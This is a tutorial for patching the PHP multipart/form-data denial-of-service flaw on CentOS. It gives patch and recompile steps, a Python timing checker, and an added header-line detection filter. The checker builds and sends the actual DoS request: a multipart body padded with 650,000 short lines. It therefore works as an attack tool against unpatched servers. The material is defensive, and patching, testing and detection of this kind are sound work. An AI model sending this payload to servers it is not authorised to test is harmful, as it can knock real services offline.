Patching the multipart/form-data vulnerability in PHP

Source: Internet
Author: User

Today I saw the PHP multipart/form-data remote DoS vulnerability on WooYun and immediately contacted colleagues to patch the production servers. First, see the tutorial on compiling and installing nginx+php-fpm+mysql on CentOS: if your installation is based on mine, you can follow the steps below directly; if not, use them as a reference.
System: CentOS 5.x (64-bit)
Required software: php-5.2-multipart-form-data.patch
1. View your PHP version
php -v
PHP 5.2.17p1 (cli) (built: Oct 29 2015 15:31:06)
Copyright (c) 1997-2010 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2010 Zend Technologies

If the version is higher than 5.3, you can upgrade PHP directly.

2. Download the patch file
wget http://soft.vpser.net/web/php/bug/php-5.2-multipart-form-data.patch
or
wget /php_patch/php-5.2-multipart-form-data.patch

3. Install the patch
5.2:
cp php-5.2-multipart-form-data.patch ~/install/php-5.2.17/
cd ~/install/php-5.2.17
patch -p1 < php-5.2-multipart-form-data.patch

5.3:
wget http://soft.vpser.net/web/php/bug/php-5.3-multipart-form-data.patch
patch -p1 < php-5.3-multipart-form-data.patch

Remove lines 42 to 45:

if [ "$php_version" = "$old_php_version" ]; then
    echo "Error: The upgrade PHP Version is the same as the old version!!"
    exit 1
fi

4. Re-compile PHP

./configure --prefix=/usr/local/php --enable-fastcgi --enable-fpm --with-fpm-log=/var/log/php-fpm.log \
--with-fpm-conf=/etc/php-fpm.conf --with-fpm-pid=/var/run/php-fpm.pid --with-config-file-path=/etc \
--with-config-file-scan-dir=/etc/php.d --with-openssl --with-zlib --enable-bcmath --with-bz2 --with-curl \
--enable-ftp --with-gd --enable-gd-native-ttf --with-jpeg-dir --with-png-dir --with-gettext \
--enable-mbstring --with-mcrypt --enable-soap --enable-zip --with-iconv=/usr/local/libiconv \
--with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysql_config --without-pear

PS: It is best to check the configure parameters your own PHP was built with and reuse them: php -i | grep configure

make && make install

All right, the vulnerability is now patched. So how do we check for it? See the following script:
cat dd.py

'''
Author: Shusheng Liu, The Department of Security Cloud, Baidu
Email: liusscs@163.com
'''
import sys
import urllib, urllib2
import datetime
from optparse import OptionParser

def http_proxy(proxy_url):
    # Optional: send the test request through an HTTP proxy
    proxy_handler = urllib2.ProxyHandler({"http": proxy_url})
    null_proxy_handler = urllib2.ProxyHandler({})
    opener = urllib2.build_opener(proxy_handler)
    urllib2.install_opener(opener)
#end http_proxy

def check_php_multipartform_dos(url, post_body, headers):
    # POST the body and classify the server by how long the response takes
    req = urllib2.Request(url)
    for key in headers.keys():
        req.add_header(key, headers[key])
    starttime = datetime.datetime.now()
    fd = urllib2.urlopen(req, post_body)
    html = fd.read()
    endtime = datetime.datetime.now()
    usetime = (endtime - starttime).seconds
    if usetime > 5:
        result = url + ' is vulnerable'
    elif usetime > 3:
        result = 'need to check normal respond time'
    else:
        # Fast response: no sign of slow multipart header parsing
        result = url + ' does not appear vulnerable'
    return [result, usetime]
#end

def main():
    #http_proxy("http://127.0.0.1:8089")
    parser = OptionParser()
    parser.add_option("-t", "--target", action="store",
                      dest="target",
                      default=False,
                      type="string",
                      help="test target")
    (options, args) = parser.parse_args()
    if options.target:
        target = options.target
    else:
        return

    num = 650000
    headers = {'Content-Type': 'multipart/form-data; boundary=----webkitformboundaryx3b7rdmpcqlzmje1',
               'Accept-Encoding': 'gzip, deflate',
               'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
    body = "------webkitformboundaryx3b7rdmpcqlzmje1\nContent-Disposition: form-data; name=\"file\"; filename=sp.jpg"
    payload = ""
    for i in range(0, num):
        payload = payload + "a\n"
    body = body + payload
    body = body + "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------webkitformboundaryx3b7rdmpcqlzmje1--"
    print "starting ..."
    respond = check_php_multipartform_dos(target, body, headers)
    print "Result:"
    print respond[0]
    print "Respond Time: " + str(respond[1]) + " seconds"

if __name__ == "__main__":
    main()

This script is used for testing, and if you do bad things, it has nothing to do with this site.
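
A server-side counterpart to the timing test above, as an added example that is not part of the original article: the test body places 650000 short lines between a part's Content-Disposition line and the blank line that ends the part headers, so a request filter or log analyzer can count header lines per part instead of measuring response time. The function names, the 32-line threshold and the sample bodies are assumptions constructed for this example.

```python
import re

# Assumed limit (not from the article): normal clients send 2-3 header lines per part.
MAX_PART_HEADER_LINES = 32

def boundary_from_content_type(content_type):
    """Extract the boundary token; tolerates a missing ';' before 'boundary='."""
    m = re.search(r'boundary="?([^";,\s]+)', content_type, re.I)
    return m.group(1).encode() if m else None

def part_header_line_counts(body, boundary):
    """Return, per part, the number of lines before the blank line ending its headers."""
    counts = []
    # Segment 0 is the preamble; a segment starting with "--" is the closing delimiter.
    for seg in body.split(b"--" + boundary)[1:]:
        if seg.startswith(b"--"):
            break
        end = re.search(rb"\r?\n\r?\n", seg)
        # No blank line at all means the whole segment is header lines (worst case).
        header_block = seg[:end.start()] if end else seg
        counts.append(len([l for l in re.split(rb"\r?\n", header_block) if l]))
    return counts

def inspect(content_type, body):
    """Return (suspicious, max_header_lines) for one multipart request."""
    boundary = boundary_from_content_type(content_type)
    if boundary is None:
        return (False, 0)
    worst = max(part_header_line_counts(body, boundary), default=0)
    return (worst > MAX_PART_HEADER_LINES, worst)

def build_sample(filler_lines):
    """Constructed sample shaped like the article's test body (mixed \\n and \\r\\n)."""
    b = "----constructedboundary0001"
    body = "--" + b + '\nContent-Disposition: form-data; name="file"; filename=sp.jpg\n'
    body += "a\n" * filler_lines
    body += "Content-Type: application/octet-stream\r\n\r\ndatadata\r\n--" + b + "--"
    return "multipart/form-data; boundary=" + b, body.encode()

if __name__ == "__main__":
    for n in (0, 2000):  # constructed: an ordinary upload vs. a padded header block
        print(n, inspect(*build_sample(n)))
```

Rejecting such requests in front of PHP limits exposure on hosts that cannot be rebuilt immediately; it does not replace the patch.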
